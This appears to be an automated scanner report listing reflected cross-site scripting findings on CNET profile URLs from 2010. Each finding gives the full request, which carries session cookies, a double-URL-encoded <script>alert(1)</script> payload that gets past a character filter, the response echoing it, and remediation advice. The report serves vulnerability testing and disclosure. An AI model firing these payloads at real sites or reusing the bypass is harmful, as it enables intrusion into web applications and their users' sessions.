GET /profile/katzmaier70163%253cscript%253ealert%25281%2529%253c%252fscript%253eda5233767fb/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:47 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:47 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=961 Connection: Keep-Alive Content-Length: 31034
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>katzmaier70163<script>alert(1)</script>da5233767fb's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1ac9f%253cscript%253ealert%25281%2529%253c%252fscript%253e291757f0173 was submitted in the REST URL parameter 2. This input was echoed as 1ac9f<script>alert(1)</script>291757f0173 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/kellymorrison1ac9f%253cscript%253ealert%25281%2529%253c%252fscript%253e291757f0173/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:43 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:44 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=924 Connection: Keep-Alive Content-Length: 31127
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>kellymorrison1ac9f<script>alert(1)</script>291757f0173's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0016%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e389fc635539 was submitted in the REST URL parameter 2. This input was echoed as e0016"><script>alert(1)</script>389fc635539 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/kellymorrisone0016%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e389fc635539/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:42 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:42 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=995 Connection: Keep-Alive Content-Length: 31116
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="kellymorrisone0016"><script>alert(1)</script>389fc635539"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b91d3%253cscript%253ealert%25281%2529%253c%252fscript%253e40d803e6822 was submitted in the REST URL parameter 2. This input was echoed as b91d3<script>alert(1)</script>40d803e6822 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/lancewhitneyb91d3%253cscript%253ealert%25281%2529%253c%252fscript%253e40d803e6822/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:06:57 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:06:57 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=961 Connection: Keep-Alive Content-Length: 31065
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>lancewhitneyb91d3<script>alert(1)</script>40d803e6822's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b1a7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2dfbfbce1b5 was submitted in the REST URL parameter 2. This input was echoed as 2b1a7"><script>alert(1)</script>2dfbfbce1b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/lancewhitney2b1a7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2dfbfbce1b5/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:06:55 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:06:55 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=977 Connection: Keep-Alive Content-Length: 31329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="lancewhitney2b1a7"><script>alert(1)</script>2dfbfbce1b5"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4cf12%253cscript%253ealert%25281%2529%253c%252fscript%253e8ff72b1c529 was submitted in the REST URL parameter 2. This input was echoed as 4cf12<script>alert(1)</script>8ff72b1c529 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/larrymagid4cf12%253cscript%253ealert%25281%2529%253c%252fscript%253e8ff72b1c529/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:43 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:43 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=969 Connection: Keep-Alive Content-Length: 31114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>larrymagid4cf12<script>alert(1)</script>8ff72b1c529's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e0a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec9ef87e3075 was submitted in the REST URL parameter 2. This input was echoed as a2e0a"><script>alert(1)</script>c9ef87e3075 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/larrymagida2e0a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec9ef87e3075/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:41 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:41 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=969 Connection: Keep-Alive Content-Length: 31095
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="larrymagida2e0a"><script>alert(1)</script>c9ef87e3075"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66c96%253cscript%253ealert%25281%2529%253c%252fscript%253ef3196c8d5c2 was submitted in the REST URL parameter 2. This input was echoed as 66c96<script>alert(1)</script>f3196c8d5c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/lgrunin66c96%253cscript%253ealert%25281%2529%253c%252fscript%253ef3196c8d5c2/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:50 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:50 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=996 Connection: Keep-Alive Content-Length: 31005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>lgrunin66c96<script>alert(1)</script>f3196c8d5c2's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22ccf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebaaa7922a1f was submitted in the REST URL parameter 2. This input was echoed as 22ccf"><script>alert(1)</script>baaa7922a1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/lgrunin22ccf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebaaa7922a1f/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:49 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:49 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=973 Connection: Keep-Alive Content-Length: 31082
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="lgrunin22ccf"><script>alert(1)</script>baaa7922a1f"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 47f5a%253cscript%253ealert%25281%2529%253c%252fscript%253e847712e8a80 was submitted in the REST URL parameter 2. This input was echoed as 47f5a<script>alert(1)</script>847712e8a80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/lindsey.turrentine47f5a%253cscript%253ealert%25281%2529%253c%252fscript%253e847712e8a80/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:45 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:46 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=998 Connection: Keep-Alive Content-Length: 31121
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>lindsey.turrentine47f5a<script>alert(1)</script>847712e8a80's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7b1f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2833c3e717f was submitted in the REST URL parameter 2. This input was echoed as f7b1f"><script>alert(1)</script>2833c3e717f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/lindsey.turrentinef7b1f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2833c3e717f/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:44 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:45 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=992 Connection: Keep-Alive Content-Length: 31226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="lindsey.turrentinef7b1f"><script>alert(1)</script>2833c3e717f"/> ...[SNIP]...
